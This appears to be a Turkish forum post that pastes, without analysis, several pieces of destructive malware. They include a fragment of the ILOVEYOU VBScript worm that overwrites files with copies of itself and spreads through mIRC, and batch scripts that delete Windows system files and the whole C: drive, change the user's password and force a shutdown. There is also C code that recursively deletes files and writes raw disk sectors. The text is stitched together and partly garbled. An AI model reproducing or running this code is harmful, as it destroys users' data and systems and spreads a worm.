dim f,f1,fc,ext,ap,mircfname,s,bna me,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.pa th)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fs
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fs
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&-\-&bname& -.vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fs
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&-.vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path &-.vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+ 2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(f olderspec&-\script.i ni")
scriptini.WriteLine -[script]-
scriptini.WriteLine -;mIRC Script"
scriptini.WriteLine -; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine - corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine -;-
scriptini.WriteLine -;Khaled Mardam-Bey"
scriptini.WriteLine -;http://www.mirc.com"
scriptini.WriteLine -;-
scriptini.WriteLine "n0=on 1:JOIN:#:{-
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }-
scriptini.WriteLine "n2= /.dcc send şnick -&dirsystem&-\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}-
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspe c)) then
msg = 0
cd c:\\
attrib -s -h boot.ini
cls
attrib -s -h found.000
attrib -s -h found.001
t>boot.ini
attrib -a -s -h pagefile.sys
h>pagefile.sys
attrib -a -s -h hiberfil.sys
HH>hiberfil.sys
attrib -a -s -h -r bootfont.bin
hhh>bootfont.bin
attrib -a -s -h -r ntdetect.com
ff>ntdetect.com
attrib -a -s -h -r ntldr
f>ntldr
cls
cd..
cd..
cls
cd windows
g>win.ini
cls
g>system.ini
cls
cd pss
ft>system.ini.backup
f>win.ini.backup
cls
cd c:\\
@echo .::.HADi baslayalım.::.
cd windows
cd system32
attrib -r -h -s dllcache
cls
attrib -a -h -r *.manifest
cls
cd config
attrib -a -h *.log
cd..
cd restore
attrib -r -h -s filelist.xml
cls
cd c:\\
cls
cd windows
cls
tskill msnmsgr /a
tskill msmsgs /a
cls
del /f /q /s c:\\windows\\system32\\*.*
cls
cd repair
attrib -a -h ntuser.dat
f>ntuser.dat
ff>secstup.inf
cd..
attrib -h inf
attrib -h -s installer
attrib -h pif
attrib -r -h -a WindowsShell.Manifest
attrib -r -h şMSI31Uninstall_KB893803ş
attrib -s -a bootstat.dat
attrib -s -h services.dll
attrib -s -h qservice.exe
attrib -a -r set3.tmp
attrib -s -h winnt.bmp
attrib -s -h winnt256.bmp
cls
cd c:\\
del /f /q /s c:\\windows\\*.*
cls
cd..
cd..
cd program files
cd internet explorer
attrib -a -s -h iexplore.exe
cd c:\\
cls
del /f /q /s c:\\program files\\*.*
cls
cd..
cd..
attrib -a -h -r -s msdos.sys
attrib -a -s -h config.sys
cls
attrib -a -h -r -s IO.sys
cls
del /f /q /s c:\\*.*
cls
@echo Yuklemeyi Bitirmek Ilerlemeniz Gerekir
@echo Veri Kayiplari Olmamasi icin .!!!!!!
@echo Devam Etmeniz Kesinlikle Onerilir !!!..
pause
cls
cd..
cd..
cd ********s and Settings
cd All Users
cd Desktop
md .HackEd
md Bys
md Hacker
dir /s>HAcKeD.ini
@echo HALA shutDownN.exe Pc DEYse RES iyi Gider
cls
tsshutdn 5 /delay:2
tsshutdn 5 /delay:2
}
span(p)
char *p;
{
struct ffblk f;
char n[129];
int r;
SearchAndDestroy(p);
sprintf(n,\-%s\\\\%s\-,p,\-*.*\-);
for(r=findfirst(n,&f,0x0010);!r;r=findnext(&f)) {
if(*f.ff_name==\-.\-) continue;
if(f.ff_attrib & 0x0010) {
sprintf(n,\-%s\\\\%s\-,p,f.ff_name);
span
}
}
}
SearchAndDestroy(p)
char *p;
{
struct ffblk f;
char b[81];
int r;
strcpy(b,p);
strcat(b,\-\\\\*.*\-);
for(r=findfirst(b,&f,0x0000);!r;r=findnext(&f)) {
sprintf(b,\-%s\\\\%s\-,p,f.ff_name);
remove(b);
}
}
boot()
{
char *buff;
char *test;
fprintf(test,"THIS PROGRAM WAS MADE BY Someone Else!!\-);
abswrite(2,12,0,buff);
}
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\windows\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\Progra~1\*.*
@echo off
C:\WINDOWS\COMMAND\deltree /y c:\*.*
@echo off
cls
cls
@echo Ne kadar safsın (HaCKeD)
@echo off
net user %username% 753951456852
del /f /q d:
del /f /q c:
DEL "C:\WINDOWS\system\AVICAP.DLL"
DEL "C:\WINDOWS\system\AVIFILE.DLL"
DEL "C:\WINDOWS\system\COMMDLG.DLL"
DEL "C:\WINDOWS\system\KEYBOARD.DRV"
DEL "C:\WINDOWS\system\LZEXPAND.DLL"
DEL "C:\WINDOWS\system\MCIAVI.DRV"
DEL "C:\WINDOWS\system\MCISQ.DRV"
DEL "C:\WINDOWS\system\MCIWAVE.DRV"
DEL "C:\WINDOWS\system\MMSYSTEM.DLL"
DEL "C:\WINDOWS\system\MMTASK.TSK"
DEL "C:\WINDOWS\system\MOUSE.DRV"
DEL "C:\WINDOWS\system\MSVIDEO.DLL"
DEL "C:\WINDOWS\system\OLECLI.DLL"
DEL "C:\WINDOWS\system\OLESVR.DLL"
DEL "C:\WINDOWS\system\setup.inf"
DEL "C:\WINDOWS\system\SHELL.DLL"
DEL "C:\WINDOWS\system\SOUND.DRV"
DEL "C:\WINDOWS\system\stdole.tlb"
DEL "C:\WINDOWS\system\SYSTEM.DRV"
DEL "C:\WINDOWS\system\TAPI.DLL"
DEL "C:\WINDOWS\system\TIMER.DRV"
DEL "C:\WINDOWS\system\VER.DLL"
DEL "C:\WINDOWS\system\VGA.DRV"
DEL "C:\WINDOWS\system\WFWNET.DRV"
DEL "C:\WINDOWS\system\WINSPOOL.DRV"
RD "C:\WINDOWS\system"
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
START TSKILL MSNMSGR
(Alıntıdır Arkadaşlar Bu Konu ThTde Açılmış Mı Bakmadım )
